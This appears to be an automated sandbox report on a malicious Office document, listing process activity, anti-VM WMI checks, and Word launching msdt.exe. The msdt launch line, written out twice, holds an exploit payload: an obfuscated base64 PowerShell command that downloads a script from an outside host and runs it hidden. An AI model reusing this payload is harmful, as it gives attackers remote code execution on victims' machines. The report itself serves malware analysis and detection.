            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries memory information (via WMI often done to detect virtual machines)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from win32_PhysicalMemory
            Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from win32_PhysicalMemory
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterConfiguration
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3768Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1280
            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 944
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4486
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2854
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_computersystem
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: ram.txt.25.drBinary or memory string: Manufacturer : VMware Virtual RAM
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdQBtAG0AaQB0AC4AZABpAGQAbgBzAC4AcgB1AC8AZgBvAHIAYgBlAHMAdAAuAHAAcwAxACcALAAgACcAQwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwApACAAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFUAbgByAGUAcwB0AHIAaQBjAHQAZQBkACAALQBGAGkAbABlACAAQwA6AC8AVwBpAG4AZABvAHcAcwAvAFQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdQBtAG0AaQB0AC4AZABpAGQAbgBzAC4AcgB1AC8AZgBvAHIAYgBlAHMAdAAuAHAAcwAxACcALAAgACcAQwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwApACAAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFUAbgByAGUAcwB0AHIAaQBjAHQAZQBkACAALQBGAGkAbABlACAAQwA6AC8AVwBpAG4AZABvAHcAcwAvAFQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /all
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP"
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
            Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
